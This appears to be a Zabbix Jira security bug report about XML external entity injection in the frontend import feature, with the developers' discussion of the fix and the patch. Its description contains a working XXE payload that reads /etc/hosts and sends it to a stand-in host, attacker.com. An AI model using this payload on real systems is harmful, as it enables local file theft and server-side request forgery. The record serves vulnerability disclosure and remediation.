[ZBX-8151] Zabbix 1.8.x-2.2.x Local File Inclusion via XXE Attack Created: 2014 Apr 25  Updated: 2020 Jul 16  Resolved: 2014 Jun 26

Status: Closed
Project: ZABBIX BUGS AND ISSUES
Component/s: API (A), Frontend (F)
Affects Version/s: 1.8.19, 1.8.20, 2.0.9, 2.0.10, 2.0.11rc2, 2.0.11, 2.2.2, 2.2.3rc1, 2.2.3rc2, 2.2.3
Fix Version/s: 1.8.21rc1, 2.0.13rc1, 2.2.5rc1, 2.3.2

Type: Defect (Security) Priority: Critical
Reporter: pnig0s Assignee: Unassigned
Resolution: Fixed Votes: 0
Labels: frontend, import, security, vulnerability, xxe
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment:

CentOS 6.5 x84

Attachments: File ZBX_8151_2_2_2.patch     JPEG File poc_screenshot_01.jpg     JPEG File poc_screenshot_02.jpg    
Issue Links:
Duplicate

 Description   

zabbix frontend support xml data import feature,and server-side use DOMDocument to parse xml.DOMDocument also parse the external dtd in default.So attacker can use a crafted xml to read arbitrary local file and send http request use zabbix server as a proxy.

==Reproduction:
ext.dtd place at http://attacker.com/
<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://attacker.com/?%file;'>"
>
%all;

zabbix.xml to import:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/hosts">
<!ENTITY % dtd SYSTEM "http://attacker.com/ext.dtd">
%dtd;
%send;
]]>
<zabbix_export>
</zabbix_export>
After import zabbix.xml to zabbix server,the contents of hosts file will send to attacker.com.Attacker can get the content by checking the website access log. If use file:///etc/hosts to replace php://filter/read=convert.base64-encode/resource=/etc/hosts.the file content will print on the web page as an error directly.

==
This bug was found by pnig0s@Freebuf

 Comments   
Comment by pnig0s [ 2014 Jun 14 ]

Still no fix release for this?

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 16 ]

Can you please provide details about the system hosting Zabbix (os version, php version, libml version)? It seems that this vulnerability affects only systems that have DTDLOAD libxml flag set (obsolete redhat's, mostly) and can not be fixed on zabbix level (please note that forcing libxml to load external DTD by default is a major security hole itself).

Comment by Pavels Jelisejevs (Inactive) [ 2014 Jun 16 ]

An update from Andrejs:

UPD: we CAN siable this behaiviour by calling http://lv1.php.net/manual/en/function.libxml-disable-entity-loader.php libxml_disable_entity_loader(true); just before simplexml_load_file

Comment by pnig0s [ 2014 Jun 16 ]

Yes,you can use libxml_disable_entity_loader(true); to disable the entity parsing or just throw an error when come cross a DTD tag.I use ubuntu10.04 libxml2.6.The newest version of libxml has fixed this problem,but there are a lot of vulnerable host in the wild.

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 17 ]

RESOLVED
fixed in development branch svn://svn.zabbix.com/branches/dev/ZBX-8151-18 r46594 for 1.8
fixed in development branch svn://svn.zabbix.com/branches/dev/ZBX-8151-20 r46600 for 2.0+

Comment by Pavels Jelisejevs (Inactive) [ 2014 Jun 18 ]

(1) Please add a comment why the LIBXML_IMPORT_FLAGS constant is required. Otherwise good.

andrewtch CLOSED

Comment by Pavels Jelisejevs (Inactive) [ 2014 Jun 18 ]

TESTED.

Please take care of (1) before merging.

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 18 ]

Waiting for 2.2 to unfreeze before merge (as for June 18 2014).

Comment by Ingus Vilnis [ 2014 Jun 20 ]

(2) Please create a patch for customer using 2.2.2 frontend.

andrewtch please see https://support.zabbix.com/secure/attachment/28912/ZBX_8151_2_2_2.patch attached, apply with:

patch -p0 -i ZBX_8151_2_2_2.patch

from Zabbix root. Should also work on other 2.0 / 2.2 branches.

RESOLVED.

ingus.vilnis CLOSED. May be reopened because the customer has not confirmed the patch yet (as of June 26).

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 20 ]

Patch for 2.2.2 (should work on any 2.0 / 2.2).

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 25 ]

Closed in pre-1.8.21rc1 r46795, pre-2.0.13rc1 r46796, pre-2.2.5rc1 r46797, pre-2.3.2 r46799.

Comment by richlv [ 2014 Jun 25 ]

subissues (1) and (2) still not closed

Comment by richlv [ 2014 Jun 25 ]

(3) changelog entry only has F component marked - didn't this fix affect the api in some way, too ? (configuration.import or anything else)

andrewtch RESOLVED, corrected changelogs

richlv note that more recent changelogs have sections for older releases - apparently those have not been updated

andrewtch Must be fixed by now

<richlv> thanks, looks good to me -> CLOSED

Comment by richlv [ 2014 Jun 25 ]

(4) it's a common practice to mention reporters for security issues - in this case let's add in the changelog entry "; thanks to pnig0s@Freebuf for the report"

andrewtch RESOLVED, updated changelogs

richlv note that more recent changelogs have sections for older releases - apparently those have not been updated

andrewtch Must be fixed by now

<richlv> thanks, looks good to me -> CLOSED

Generated at Thu Apr 25 03:19:58 EEST 2024 using Jira 9.12.4#9120004-sha1:625303b708afdb767e17cb2838290c41888e9ff0.